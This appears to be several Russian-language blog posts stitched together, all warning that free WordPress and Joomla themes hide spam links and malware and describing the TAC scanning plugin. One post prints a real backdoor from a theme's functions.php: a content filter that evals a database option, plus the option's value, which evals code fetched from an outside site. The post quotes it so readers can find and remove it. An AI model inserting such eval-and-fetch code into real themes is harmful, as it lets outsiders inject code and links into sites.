Под движок WordPress создано большое количество бесплатных тем и шаблонов. Все, что нам остается сделать – это найти правильный шаблон, скачать его и установить на свой блог. Собственно, так многие начинающие вебмастера и поступают. При этом они совершенно не задумываются о том, что данные шаблоны могут быть небезопасны для их будущего сайта. Шаблоны же часто создаются обычными пользователями движка WordPress.
Некоторые создатели размещают в шаблонах кучу внешних ссылок, которые могут вести на весьма сомнительные сайты. К примеру, шаблон содержит большое количество ссылок на ресурсы сексуальной направленности. Внешне эти ссылки не будут видны. Однако поисковый робот все равно их проиндексирует и отдаст данным сайтам часть вашего индекса цитирования. Кроме того, к вашему ресурсу могут быть применены различные санкции (если ссылок на подозрительные сайты слишком много). Возникает вопрос – что же делать с такими вот бесплатными шаблонами? Кстати, платные шаблоны тоже, не редко, грешат наличием скрытых ссылок.
Как проверить шаблон на внешние ссылки?
Проверить шаблон на наличие спрятанных в него внешних ссылок поможет плагин под названием TAC (аббревиатура расшифровывается как Theme Authenticity Checker). Скачать его можно по следующей ссылке на официальном сайте WordPress. Данный плагин полностью бесплатный, а также простой в установке и использовании.
После активации TAC, необходимо зайти в его параметры, располагающиеся по следующему пути — «Внешний вид» — «TAC». Там можно посмотреть результаты сканирования всех тем, которые установлены на вашем блоге. Если с темой все в порядке, то рядом с ее названием будет зеленый прямоугольник с надписью «Theme OK!».
Следует помнить, что эта надпись означает отсутствие каких-либо закодированных ссылок. Все остальные внешние ссылки будут указаны чуть ниже. Внимательно изучите эти ссылки и проверьте, куда они ведут. Как правило, в каждом шаблоне есть ссылка на сайт его создателя. Обычно эта ссылка является видимой для посетителей блога и находится в футере.
Среди вебмастеров принято не удалять такие ссылки, ведь это своеобразная дань уважения автору шаблона, который сделал его для вас бесплатно. Если в шаблоне есть ссылки на какие-то другие сайты, то их лучше удалить. Сделать это можно при помощи , открыв необходимый файл шаблона.
На этом буду заканчивать. Удачи Вам! и до следующих статей.
С огромным Уважением,
Понравилась статья? Подпишитесь на новости блога или поделитесь в социальных сетях, а я отвечу вам
3 комментариев к посту “Плагин TAC или как проверить шаблон на внешние ссылки”
Просканировал я им шаблон и он показал — ок. Хотя что то добавляет ссылку wp-load.php. Что еще посоветуешь?
Привет друзья. Вы уверены, что бесплатный шаблон WordPress, который вы используете для своих сайтов и блогов действительно безопасный и не содержит скрытых угроз и вредоносного кода? Вы полностью в этом уверены? Абсолютно?)
Думаете, прогнали шаблон через , удалили из него скрытые ссылки, и дело сделано. Файлы сайта сканируете периодически антивирусом, заглядываете в инструменты вебмастера Яндекса во вкладку Безопасность и с облегчением видите там сообщение: «Вредоносный код на сайте не обнаружен «.
Вот и я так думал. Не хотел бы вас расстраивать, но…
Скрытый опасный код в бесплатных шаблонах WordPress
Вот такое письмо я получил на прошлой неделе на почту от своего хостинга. С недавних пор они ввели регулярную проверку всех файлов сайта на поиск вредоносного содержания и таки они это содержание у меня обнаружили!
Началось все с того, что я зашел как-то днем на свой сайт и не смог его запустить — вылезала ругательная надпись про не найденные файлы с расширением php. Немного напрягшись пошел изучать содержимое папки с сайтом на хостинге и сразу же обнаружил проблему — мой файл шаблона fuctions.php был переименован в functions.php.malware что как бы неоднозначно намекало — здесь поработал антивирус или что-то вроде этого) Зайдя на почту я и обнаружил вышеупомянутый отчет от хостера.
Первым делом я конечно же начал проверять данный файл, изучал его содержимое, сканировал всевозможными антивирусами, десятками онлайн сервисов по проверке на вирусы и т.д. — в итоге ничего не обнаружил, все в один голос утверждали что файл совершенно безопасный. Я разумеется выразил свои сомнения хостеру, мол вы чего-то напутали, но на всякий случай попросил их предоставить отчет об обнаружении вредоносного куска кода.
И вот что они мне ответили
Пошел гуглить инфу о данном коде и серьезно задумался…
Как найти фрагмент вредоносного кода в шаблоне
Как оказалось, это действительно нетривиальный прием, который позволяет заинтересованным лицам передавать данные на ваш сайт и изменять содержимое страниц без вашего ведома! Если вы используете бесплатный шаблон, то настоятельно рекомендую проверить свой functions.php на наличие следующего кода :
add_filter(‘the_content’, ‘_bloginfo’, 10001);
function _bloginfo($content){
global $post;
if(is_single() && ($co=@eval(get_option(‘blogoption’))) !== false){
return $co;
} else return $content;
}
Даже с моими весьма неглубокими познаниями в php видно, что создается некий фильтр, привязываемый к глобальной переменной post и content отвечающие за вывод контента только на страницах записей блога (условие is_single). Уже подозрительно не так ли? Ну а теперь посмотрим что же такого собирается выводить данный код у нас на сайте.
Интересная опция blogoption запрашиваемая в базе данных так же выглядит весьма подозрительной. Заходим в нашу базу данных MySQL и находим там таблицу под названием wp_options, если вы не меняли префиксы то она так будет выглядеть по умолчанию. И в ней находим заинтересовавшую нас строку под названием blogoption
Какая красота! Мы видим следующую опцию
return eval(file_get_contents(‘http://wpru.ru/aksimet.php?id=’.$post->ID.’&m=47&n’));
Т.е. нам с некого сайта (причем русского заметьте) возвращают содержимое, которое может нести в себе все что угодно! Любое количество ссылок, вредоносные коды, измененный текст и т.д. Сам сайт при заходе на него выдает 403 ошибку доступа, что не удивительно. Разумеется данную опцию я тоже удалил из БД.
По информации от пострадавших обычно возвращается точно такое содержимое вашей статьи с одной лишь модификацией — вместо какой-либо точки «.» в текст маскировалась открытая ссылка! И кстати, данная опция записывается в базу данных при установке самого шаблона, а затем код, который это делает благополучно самоуничтожается. И вот с такой дрянью я жил два года, и ни один антивирус или сервис мне так и не выявил данную угрозу за все то время. Честно говоря я не замечал, срабатывал ли когда-нибудь со мной такой прием, или же эту возможность блокировал мой плагин безопасности (а может одно из обновлений WordPressa закрыло эту дыру), но все равно неприятно.
Мораль про бесплатный сыр
Как вам изощренность наших «переводчиков» шаблонов (или тех кто выкладывает их у себя в каталогах)? Это вам не ссылки из футера выпиливать) Жалко я уже не помню, откуда я скачивал свой шаблон, давно это было, а то бы обязательно пару ласковых написал. И если бы на тот момент обладал тем же опытом, что имею сейчас, то однозначно не пользовался бы бесплатным шаблоном, или на крайний случай не качал бы с неизвестных источников!
Проще купить какой-нибудь официальный премиум шаблон за 15-20 баксов на том же и жить спокойно, зная что в нем нет дырок и зашифрованных ссылок, а если даже и найдутся уязвимости, то разработчики обязательно выпустят обновление, в котором эти дырки закроют. (У Артема кстати недавно вышла статья, где он как раз про премиум шаблоны рассказывает и даже раздает промокоды на зверские скидки, кому интересно )
Здравствуйте, уважаемые читатели блога сайт. Сейчас уже мало найдется вебмастеров, которые верстают свой сайт сами (на чистом Html, своем движке или хотя бы используют для CMS созданные своими руками шаблоны). В общем-то это верно, ибо не каждый способен сотворить что-то стоящее — тут нужен талант дизайнера. Чаще всего выходит как минимум «не очень», а иногда и «просто ужас».
Поэтому столь большое распространение получили шаблоны или темы оформления (в разных движках «шкурки» могут обозначаться разными терминами) для популярных CMS. Особливо много этого добра можно найти на просторах интернете для Joomla и WordPress, ибо это по праву , как в рунете, так и в буржунете.
Собственно, только русскоязычных ресурсов с каталогами готовых шаблонов можно насчитать уже довольно много. Ну, а в буржунете их вообще не счесть. Вроде бы все так замечательно — ставь движок, находи подходящий шаблон (не секрет, что платные шаблоны не так уж и сложно найти в бесплатном доступе), скачивай его и наслаждайся профессиональным дизайном своего новенького сайта. Останется только добавить на него ценный контент и можно будет наблюдать за ростом популярности в сети вашего ресурса.
Но не все так просто и очевидно. Когда я еще давным-давно написал статью , то получал довольно регулярно от читателей по почте рекомендации удалить из списка тот или иной сервис, ибо в размещенных там шаблонах находят скрытые ссылки или даже вирусы . Получается, что пословица не врет — бесплатный сыр бывает только в мышеловке. Разработчики бесплатных шаблонов (или те, кто «нулит» платные) просто-напросто таким образом зарабатывают деньги и, судя по размаху, немалые.
Скрытые ссылки на сторонние (и зачастую занесенные поисковиками в черный список) ресурсы, а уж тем более вирусы, могут убить все надежды на раскрутку вашего ресурса (или серьезно их подорвать и попортить нервы). За это можно , либо . Как себя от всего этого уберечь при выборе шаблона?
Что плохого в бесплатных шаблонах для Joomla и WordPress?
По собственному опыту могу сказать, что «любителю» очень трудно тягаться с «профессионалом». В самом начале этой публикации я приводил ссылку на статью про вирусы, которыми были заражены большинство моих сайтов. Произошло это более двух лет назад, и за это время я уже не раз повторял эпопею борьбы за «чистоту кода», но по-прежнему с завидной регулярностью на ряде зараженных ресурсов происходят рецидивы (то спам-рассылка с них ведется, то дорвей формируется, то еще что-то мне совсем непонятное происходит, приводящее к чудовищно большой нагрузке на хостинг).
При этом я использую все доступные «нубу» методы поиска шелов и прочих бэкдоров в коде этих сайтов, но опять же повторюсь, что любителю тягаться с профи просто не под силу. Поэтому если вы думаете, что прокравшийся через шаблон вирус вы легко выведете, то, скорее всего, вы ошибаетесь. Дело это очень муторное, жутко раздражающее (когда вирусная активность, несмотря на все ваши предпринятые усилия, проявляется снова и снова) и отнимающее очень много времени и сил.
То же самое касается и скрытых ссылок . Хорошо, если вам попадется вариант их внедрения из прошлой эпохи, когда простым можно будет найти место вставки и навсегда избавиться от них, получив в итоге чистый и бесплатный шаблон. В большинстве же случаев все намного сложнее. Для поиска места вставки скрытых ссылок понадобится софт (например, плагин TAC), но и он не всесилен, ибо бизнес по распространению ссылок через бесплатные и платные (взломанные) шаблоны для Joomla и WordPress приносит очень хороший доход, что стимулирует практикующих его людей к поиску новых решений, позволяющих сделать их «закладку» мало заметной.
Собственно, сегодня даже оперативно проверить шаблон на генерирование «левых ссылок» бывает довольно сложно. Например, вы скачали шаблон, поставили его на сайт, добавили контент и решили посмотреть, а не появились ли с него какие-то подозрительные (не вами проставленные) внешние ссылки. Их нет. Вы довольны, забываете об этой проблеме, занимаетесь наполнением сайта и его раскруткой, а потом вдруг случайно обнаруживаете (сами или после сигнала от поисковиков в виде фильтра или бана), что скрытые ссылки все же есть и ведут они на такую «гадость», на которую вам самим никогда бы и в голову не пришло ссылаться.
Самое обидное при этом, что на снятие фильтра и «обеление» сайта в глазах поисковиков может уйти очень много времени (месяцы и даже годы в некоторых случаях). А дело тут в том, что разработчики таких «закладок» в курсе того, что вы про них знаете и проверяете сайт после установки шаблона на предмет «излишеств всяких нехороших». Поэтому они тормозят начало генерации этих самых ссылок на некоторое время, достаточное по их мнению, чтобы даже самый мнительный юзер уверовал в чистоту доставшегося ему на халяву шаблона.
Причем скрытые ссылки теперь так закодированы, что не ищутся по словам md5 или base64 (зачастую их подгрузка вообще происходит с внешнего источника). Просто набор букв и спец символов, которые никак нельзя найти через поиск по всем файлам шаблона. А этих файлов может быть не одна сотня. Плюс появляются ссылки не сразу. То есть фактически нельзя никак вебмастеру (среднестатистическому) их обнаружить на этапе создания сайта.
Ну, а во избежании заражения через шаблон я предпочитаю заплатить денежку , чтобы потом не разгребать ворох проблем. Другое дело, что денежку можно заплатить большую, а можно и не очень большую. Я лично выбираю второй вариант, но сначала поясню суть первого.
Кое-что, конечно же, можно найти и в официальных репозиториях этих движков (читайте про то, и зайти на официальный сайт расширений для Joomla), но, во-первых, выбор там существенно ограничен, а во-вторых, в такие же «одежки» будут одеты еще многие тысячи сайтов по всему миру, что несколько снижает уникальность вашего проекта и в глазах посетителей, и в глазах поисковиков.
Однако, в мире существует очень много профессиональных компаний, занимающихся разработкой платных шаблонов для Joomla и WordPress. Априори (), у них закладок быть не должно, иначе они мгновенно растеряют авторитет и доверие клиентов. Однако, цена на один шаблон у них может составлять 50-100 долларов в зависимости от его функционала и новизны.
Кроме этого могут возникнуть некоторые проблемы с оплатой (придется , либо рискнуть и совершить покупку с оплатой напрямую с пластиковой карты). Однако, в результате вы получите заведомо «чистый» шаблон, что есть хорошо. Правда, идущая с ним в нагрузку техподдежка будет актуальна лишь при вашем знании языка, на котором она осуществляется. В большинстве случае знание русского языка вам в этом деле не поможет.
Второй вариант мне больше нравится в силу его более высокой рентабельности (соотношении потраченных денег к полученным возможностям), хотя по отношению к разработчикам он и не совсем «белый». Суть его заключается в том, что Joomla и WordPress распространяются по лицензии типа GNU/GPL , т.е. лицензии на свободное программное обеспечение (такое ПО можно использовать, копировать, модифицировать и распространять). Собственно, об этом я уже писал и раньше в упомянутой в самом начале статье о шаблонах Joomla.
Если не вдаваться особо в подробности, то суть заключается в том, что и расширения (шаблоны, плагины и т.п.) для этих движков не могут являться частной собственностью авторов. Да, за них можно требовать плату, но вот наказать или преследовать по закону за несанкционированное использование или распространение этих расширений уже будет невозможно. Несмотря на это, рынок платных расширений для Joomla и WordPress огромен, хотя и не защищен законом об авторском праве . Наоборот, GNU/GPL лицензия на 100% защищает Вас от разработчика.
Многие компании разработчиков, кстати, предоставляют доступ к своим шаблона по подписке. Т.е. вы платите определенную сумму и в течении определенного времени может скачивать и дальше на постоянной основе использовать все их творения (шаблоны или расширения). Собственно, и второй способ безопасного получения тем оформления для WordPress, а также шаблонов для Joomla строится на примерно таком же принципе.
«Показал мне на него пальцем» не так давно мой товарищ, которого я упоминал в ряде статей (он уже несколько лет ищет идеальный вариант построения интернет-магазина, и на этом пути находит много такого, что мне кажется интересным и в дальнейшем активно используется). Речь идет о складчине премиум шаблонов и расширений CmsHeaven.org .
Суть складчины довольно простая — купить продукт и раздать всем, кто участвовал в складчине. В CmsHeaven.org еще больше упростили схему — тут не нужно скидываться на отдельные шаблоны или расширения, которые вам нужны. Вы просто оплачиваете временный доступ ко всему каталогу, который имеется в распоряжении этого сервиса (несколько тысяч наименований, разбитых для удобства поиска по движкам, авторам и тематикам).
Каждый из представленных продуктов был честно куплен у разработчиков на деньги складчиков (имеются и бесплатные шаблоны, но они опять же представлены известными брендами, которые им нужны в целях рекламы). И что немаловажно, организаторы постоянно пополняют каталог новыми экземплярами (с пылу с жару, что называется), которые еще долго придется ждать в паблике. Многим это придется по душе.
В общем, такой вот кооператив, куда можно вступить и пользоваться всеми благами. Но с некоторыми ограничениями. Дело в том, что организаторы хорошо понимают, что без введения ограничений весь их каталог утечет в паблик на раз-два. Поэтому имеет место быть ограничение на 36 скачиваний в месяц . Этого вполне достаточно обычному вебмастеру, и даже компании по созданию сайтов.
При этом гарантируется отсутствие в представленных расширениях и шаблонах «закладок» (скрытых ссылок, вирусов, троянов и «стучалок», которые сообщают разработчику о сайте использующем их шаблон). В виду этого покупаются только продукты известных брендов с открытым кодом, где можно все это проверить и при необходимости устранить.
Часть расширений переведена на русский язык, а при возникновении проблем с установкой или настройкой, что зачастую бывает ой как необходимо (наверное уже не раз прочесывали интернет в поисках решения возникшей на ровном месте проблемы). Этим, кстати, и отличают бесплатные движки от платных, что нет поддержки пользователей как таковой.
Да и скачивать понравившиеся вам продукты можно будет с нормальной скоростью и без просмотра рекламы на файлообменниках. Пустячок, ибо для получения вожделенной «няшки» можно и горы свернуть, а не только с файлообменником повоевать, но именно из пустяков складывается комфорт.
Вообще идея и ее реализация мне очень понравились, а вот пользоваться ли бесплатными шаблонами из репозиториев Joomla и WordPress, вступать ли в складчину на CmsHeaven.org или покупать шаблоны напрямую у разработчиков решать придется вам самим . Только «умоляю вас, не ешьте на ночь сырых помидоров», то бишь не скачивайте халявные продукты со всяких «замечательных» ресурсов, ибо можно массу проблем получить в нагрузку. А оно вам надо?
Удачи вам! До скорых встреч на страницах блога сайт
Вам может быть интересно
Как вставить код счетчиков посещений на сайт под управлением Joomla через модуль Произвольный HTML-код или напрямую в шаблон
Как самому создать профессиональный сайт-визитку без знаний Html, CSS и PHP? Ответ: MotoCMS!
Как получить адаптивный шаблон для будущего сайта, а с ним интуитивно понятную и шуструю CMS в придачу
10 смертельных ошибок при написании и публикации статей
Создание пункта меню в Joomla для входа на форум и перенос регистрации пользователей из SMF на сайт
Настройка JFusion для для объединения форума SMF и Джумла-сайта
Модули JFusion для вывода сообщений с форума на сайте, а так же создание кнопки в SMF для возврата в Джумлу
WebPoint PRO - адаптивная тема для WordPress с широким функционалом и грамотной технической поисковой оптимизацией
Share42 - скрипт для добавления на сайт кнопок социальных сетей и закладок (есть вариант плавающей панели)
Установка форума SMF - Интеграция Joomla 1.5 и Simple Machines Forum с помощью компонента JFusion
На просторах Интернета есть очень много бесплатных шаблонов сайтов. О том, что бесплатный сыр бывает только в мышеловке, знают все и все равно рука тянется скачать такую бесплатность и установить на свой сайт.
Прежде чем ставить бесплатный шаблон, не мешало бы его проверить на скрытые ссылки.
Ставя бесплатный шаблон, многие и не предполагают, что раскрутить и заработать на таком сайте просто не смогут.
В одном таком шаблоне может быть сразу несколько ссылок. Хорошо еще, если вложенные ссылки будут на схожий с вашей тематикой сайт, а не на сайты для взрослых. И их будет всего две или три, а не десятки.
Чем установка такого бесплатного шаблона грозит вашему сайту? Сайт попадет под фильтра, выйти из под которых практически невозможно. Сайт под фильтрами – мертвый сайт!
Установка бесплатного шаблона на свой сайт напоминает русскую рулетку. Только шанс установить абсолютно чистый шаблон, равен нулю.
В лучшем случае вы получите 3-5 левых ссылок на своем сайте. Можно, конечно, попробовать почистить такой шаблон, но есть умельцы, которые вписывают ссылки в шаблон так, что убрать их оттуда нельзя (нарушается шаблон, его просто перекашивает).
Если честно, то проще заказать новый чистый и уникальный (чего не скажешь о бесплатном) шаблон, дешевле обойдется.
За создание шаблона я, например, беру 200 руб (пишите в скайп: oxamitta). Вот скажите, оно того стоит? Взять бесплатность и потерять сайт, зато сэкономить 200 руб? Ничего себе экономия!!!
Но что делать, если вы уже поставили на бесплатный шаблон? Как проверить шаблон на скрытые ссылки?
Для этого существует специальный плагин. Убрать эти ссылки он не поможет, а вот выявить – пожалуйста.
Возможно, не все так страшно и в вашем шаблоне всего пара внешних ссылок! Хотите проверить шаблон? Тогда скачивайте плагин по ссылке ниже (чтобы появилась ссылка на скачивание плагина, кликните на одну из кнопок соц. сетей).
Плагин устанавливается в админке сайта стандартным образом. Снимать об этом видео нет смысла, поэтому сегодня мы обойдемся парой скриншетов.
Устанавливаете плагин и активируете.
Чтобы увеличить скриншет, кликните по нему левой клавишей мышки. 
Заходите во вкладку Внешний вид, ТАС.
